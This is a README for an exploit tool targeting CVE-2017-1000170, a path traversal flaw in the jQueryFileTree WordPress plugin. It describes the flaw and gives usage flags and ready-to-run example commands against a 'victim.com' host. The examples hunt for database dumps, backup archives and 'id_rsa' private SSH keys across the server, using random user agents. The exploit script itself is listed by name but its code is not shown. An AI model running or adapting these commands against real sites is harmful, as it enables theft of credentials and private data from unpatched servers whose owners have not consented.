Jquery File Tree 1.6.6 Path Traversal exploit (CVE-2017-1000170)
# Jquery-File-Tree-1.6.6-Path-Traversal
Jquery File Tree 1.6.6 Path Traversal exploit (CVE-2017-1000170)
The jQueryFileTree <1.6.6 plugin for Wordpress default settings fail to parse the user data causing a path traversal vulnerability.
This allows an attacker to list all the filesnames of all readable folders of the webserver.
Added to a local file inclusion or local file disclosure attack this can lead to arbitrarily download any readable file of the server.
# Usage
`$ xpl_jqueryFileTree.php -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]`
-h, --help: Show this message
-u, --url: URL of target
-a, --random-agent: Use random user agents
-f, --filter: Name of files or extensions to search for (separated by comma)
-p, --path: The full path from which the filenames will be read (default: /)
-r, --recursive: Generates the tree recursivelly (be careful)
e.g.: xpl_jqueryFileTree.php -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r
\-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths
(You must provide the dot to indicate it's an extension)
xpl_jqueryFileTree.php -u victim.com -f .log,id_rsa -a -r
\-> This will search for all files named "id_rsa" or having the extension
".log" within all folders of the server, with random user-agents
Tip: use "php ..... | tee output" to save the result to an output file

[4.0K] /data/pocs/312ea0c4ee5a589e3cfe9707595fd09c5261384b
├── [1.5K] README.md
└── [ 15K] xpl_jqueryFileTree.php
0 directories, 2 files
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